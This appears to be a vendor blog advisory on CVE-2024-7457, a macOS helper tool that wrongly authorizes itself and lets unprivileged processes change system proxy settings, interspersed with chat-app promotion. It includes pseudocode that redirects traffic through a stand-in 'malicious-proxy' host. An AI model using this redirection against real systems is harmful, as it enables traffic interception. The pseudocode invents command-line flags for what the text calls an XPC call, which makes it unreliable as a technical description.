Ameeba Blog Logo
Ameeba Chat App store presentation
Download Ameeba Chat Today
Ameeba Blog Search

CVE-2024-7457: macOS Authorization Model Exploit Leading to Potential MITM Attacks

Ameeba’s Mission: Safeguarding privacy by securing data and communication with our patented anonymization technology.

Overview

CVE-2024-7457 is a critical vulnerability found in the ws.stash.app.mac.daemon.helper tool used on macOS systems. This vulnerability stems from an incorrect use of macOS’s authorization model, potentially affecting all macOS users who have this tool installed. The implications of this vulnerability are severe as it can lead to unauthorized changes to system-wide network preferences and man-in-the-middle (MITM) attacks which can compromise the entire system and lead to data leakage.

Vulnerability Summary

CVE ID: CVE-2024-7457
Severity: High (7.8 CVSS Score)
Attack Vector: Local
Privileges Required: None
User Interaction: None
Impact: Unauthorized changes to system-wide network preferences, potential man-in-the-middle (MITM) attacks, system compromise, and data leakage

Affected Products

Ameeba Chat Icon Escape the Surveillance Era

Most apps won’t tell you the truth.
They’re part of the problem.

Phone numbers. Emails. Profiles. Logs.
It’s all fuel for surveillance.

Ameeba Chat gives you a way out.

  • • No phone number
  • • No email
  • • No personal info
  • • Anonymous aliases
  • • End-to-end encrypted

Chat without a trace.

Product | Affected Versions

MacOS | All versions with ws.stash.app.mac.daemon.helper installed

How the Exploit Works

The ws.stash.app.mac.daemon.helper tool contains a vulnerability caused by an incorrect use of macOS’s authorization model. Instead of validating the client’s authorization reference, the helper invokes AuthorizationCopyRights() using its own privileged context (root), effectively authorizing itself rather than the client. This flawed logic allows unprivileged clients to invoke privileged operations via XPC, including unauthorized changes to system-wide network preferences such as SOCKS, HTTP, and HTTPS proxy settings. The absence of proper code-signing checks further enables arbitrary processes to exploit this flaw, leading to man-in-the-middle (MITM) attacks through traffic redirection.

Conceptual Example Code

The following pseudocode gives a conceptual idea of how this exploit might be utilized:

# Pseudocode for exploiting CVE-2024-7457
import os
# Define malicious proxy settings
socks_proxy = "socks://malicious-proxy"
http_proxy = "http://malicious-proxy"
https_proxy = "https://malicious-proxy"
# Invoke privileged operations via XPC
os.system(f"ws.stash.app.mac.daemon.helper --set-socks-proxy {socks_proxy}")
os.system(f"ws.stash.app.mac.daemon.helper --set-http-proxy {http_proxy}")
os.system(f"ws.stash.app.mac.daemon.helper --set-https-proxy {https_proxy}")

In this pseudocode example, the attacker sets malicious proxy settings using the ws.stash.app.mac.daemon.helper tool. This would allow the attacker to redirect network traffic through their own proxy server, potentially performing a man-in-the-middle (MITM) attack.

Talk freely. Stay anonymous with Ameeba Chat.

Disclaimer:

The information and code presented in this article are provided for educational and defensive cybersecurity purposes only. Any conceptual or pseudocode examples are simplified representations intended to raise awareness and promote secure development and system configuration practices.

Do not use this information to attempt unauthorized access or exploit vulnerabilities on systems that you do not own or have explicit permission to test.

Ameeba and its authors do not endorse or condone malicious behavior and are not responsible for misuse of the content. Always follow ethical hacking guidelines, responsible disclosure practices, and local laws.

More posts

Ameeba Chat